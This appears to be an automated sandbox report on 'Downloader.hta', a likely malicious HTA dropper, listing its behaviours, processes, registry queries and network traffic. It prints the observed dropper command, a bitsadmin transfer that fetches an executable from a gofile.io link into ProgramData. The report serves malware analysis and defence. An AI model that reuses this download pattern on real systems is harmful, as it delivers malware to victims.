Malware Analysis Report

2024-10-24 20:51

Sample ID 240827-jdkd4a1eqm
Target Downloader.hta
SHA256 ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e
Tags discovery, dropper
Score 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 8/10

SHA256 ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e

Threat Level: Likely malicious

The file Downloader.hta was found to be: Likely malicious.

Malicious Activity Summary

discovery dropper

Download via BitsAdmin

Checks computer location settings

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-08-27 07:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-08-27 07:33
Reported 2024-08-27 07:50
Platform win10v2004-20240802-en
Max time kernel 436s
Max time network 438s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3296 wrote to memory of 4784 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\bitsadmin.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 8.8.8.8:53 | gofile.io | udp
FR | 51.38.43.18:443 | gofile.io | tcp
US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp

Files
